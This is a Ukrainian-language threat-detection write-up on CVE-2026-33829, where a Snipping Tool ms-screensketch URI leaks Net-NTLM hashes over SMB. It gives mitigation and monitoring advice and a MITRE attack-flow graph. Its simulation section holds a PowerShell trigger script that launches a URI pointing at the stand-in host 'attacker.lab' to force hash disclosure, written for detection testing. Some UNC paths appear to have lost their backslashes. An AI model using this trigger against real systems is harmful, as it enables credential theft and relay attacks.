Стежити 
Короткий виклад
Вразливість у Windows Snipping Tool може розкрити хеші Net-NTLM від поточного користувача, який увійшов у систему, віддаленому зловмиснику. Проблема викликана через зловмисне використання глибокого посилання, яке зловживає ms-screensketch URI схемою, що змушує Snipping Tool відкрити файл, розташований на неконтрольованій зловмисником SMB-частині. Хоча жертва повинна натиснути або відкрити створене посилання, витік облікових даних відбувається непомітно у фоновому режимі, коли Windows ініціює підключення SMB. Ця поведінка може надати зловмисникам доступ до даних Challenge/Response NTLM без будь-якого видимого попередження для користувача.
Розслідування
Дослідники виявили, що ms-screensketch протокол приймає параметр filePath і не обмежує належним чином довільні UNC шляхи. Коли Snipping Tool намагається отримати доступ до такого шляху, Windows автоматично намагається автентифікуватися на віддаленому сервері SMB, розкриваючи NTLM відповідь в процесі. Для перевірки проблеми дослідники створили сценарії доказу концепції, що запускали SMB прослуховувач та генерували зловмисний URI, здатний захопити витік хешу.
Пом’якшення
Microsoft випустила оновлення безпеки 14 квітня 2026 року, щоб вирішити проблему, видаливши вразливе поведінку з глибокими посиланнями з Snipping Tool. Встановлення цього патчу заважає застосунку автоматично відкривати шляхи SMB, надані зловмисниками, через ненадійні URI. Організаціям слід пріоритетно впроваджувати оновлення на уражених системах Windows, щоб усунути загрозу.
Відповідь
Захисники повинні моніторити спроби виклику ms-screensketch URI схеми і стежити за вихідними підключеннями SMB до незвичайних внутрішніх або зовнішніх вузлів. Системи, яким не потрібно використовувати Snipping Tool, повинні обмежити протокол, де це можливо, і примусити розгортання патчу без зволікань. Всі викриті NTLM хеші слід негайно розслідувати на предмет ознак повторного використання, релейної або іншої подальшої зловмисної діяльності.
graph TB classDef action fill:#99ccff classDef tool fill:#ffcc99 classDef technique fill:#ccffcc action_user_click[“<b>Дія</b> – <b>T1204.001 Виконання користувача: шкідливе посилання</b><br/>Користувач натискає на шкідливе посилання, що запускає виконання.”] class action_user_click action tool_snipping[“<b>Інструмент</b> – <b>Назва</b>: Snipping Tool (URI ms-screensketch)<br/><b>Техніка</b>: T1204 Виконання користувача<br/><b>Опис</b>: Запускається через обробник URI ms-screensketch.”] class tool_snipping tool tech_smb_conn[“<b>Техніка</b> – <b>T1550.002 Pass the Hash</b><br/>Snipping Tool обробляє filePath і ініціює SMB-з’єднання з сервером, контрольованим атакувальником, що дозволяє перехоплення хешу.”] class tech_smb_conn technique tech_hash_capture[“<b>Техніка</b> – <b>Доступ до облікових даних</b><br/>Атакувальник перехоплює Net-NTLM хеш під час SMB-аутентифікації.”] class tech_hash_capture technique tech_lateral[“<b>Техніка</b> – <b>T1550.002 Pass the Hash</b><br/>Отриманий хеш може бути повторно використаний для латерального переміщення або підвищення привілеїв.”] class tech_lateral technique tech_c2_web[“<b>Техніка</b> – <b>T1071.001 Протокол прикладного рівня: веб-протоколи</b><br/>Атакувальник може використовувати HTTP/S для командно-керуючого зв’язку.”] class tech_c2_web technique tech_persistence[“<b>Техніка</b> – <b>T1574.006 Перехоплення потоку виконання: перехоплення динамічного лінкера</b><br/>Можлива стійкість через перехоплення динамічного лінкера процесу Snipping Tool.”] class tech_persistence technique action_user_click –>|executes| tool_snipping tool_snipping –>|initiates SMB| tech_smb_conn tech_smb_conn –>|leads to| tech_hash_capture tech_hash_capture –>|enables| tech_lateral tech_hash_capture –>|enables| tech_c2_web tool_snipping –>|may lead to| tech_persistence
Потік Атаки
Симуляція Виконання
Вимога: Перевірка телеметрії та базової лінії повинна бути пройдена.
Обґрунтування: Секція детально описує точне виконання техніки противника (TTP), призначеної для виклику правила виявлення. Команди та розповідь МАЮТЬ безпосередньо відображати визначені TTP та спрямовані на створення очікуваної телеметрії, що визначена логікою виявлення.
-
Атака Оповідання та Команди:
Зловмисник отримав доступ до робочої станції жертви та бажає зібрати хеші NTLM без привернення уваги. Використовуючи CVE‑2026‑33829, зловмисник створює зловмисний
ms‑screensketch:URI, що вказує на віддалене SMB-сховище, контрольоване зловмисником (\attacker.labsharepayload.png). Коли Snipping Tool обробляє цей URI, Windows автоматично ініціює SMB-з’єднання з віддаленим сервером, розкриваючи NTLM відповідь машини. Зловмисник виконує URI через PowerShell, щоб забезпечити виклик Snipping Tool в контексті користувача. -
Сценарій Регресійного Тесту:
# Витік NTLM через Snipping Tool - тригерний скрипт # Налаштуйте UNC шлях для направлення на ваш контрольований прослуховувач. $attackerServer = "attacker.lab" $sharePath = "sharepayload.png" $uri = "ms-screensketch:edit?filePath=\$attackerServer$sharePath" Write-Host "Виклик Snipping Tool із зловмисним URI..." Start-Process $uri # Почекайте кілька секунд, поки не завершиться SMB підключення Start-Sleep -Seconds 5 Write-Host "Виконання завершено. Перевірте SIEM для події EventID 3 з DestinationHostname, що містить '$attackerServer'." -
Команди Очищення:
# Видаліть будь-які залишкові процеси Snipping Tool (якщо ще працюють) Get-Process -Name "SnippingTool","SnippingTool.exe","ScreenSketch","ScreenSketch.exe" -ErrorAction SilentlyContinue | Stop-Process -Force # Опційно: видалити тимчасові файли, створені на боці зловмисника (якщо такі є) # (Припускаєте, що у вас є доступ на запис до сховища) # Remove-Item -Path "\$attackerServer$sharePath" -Force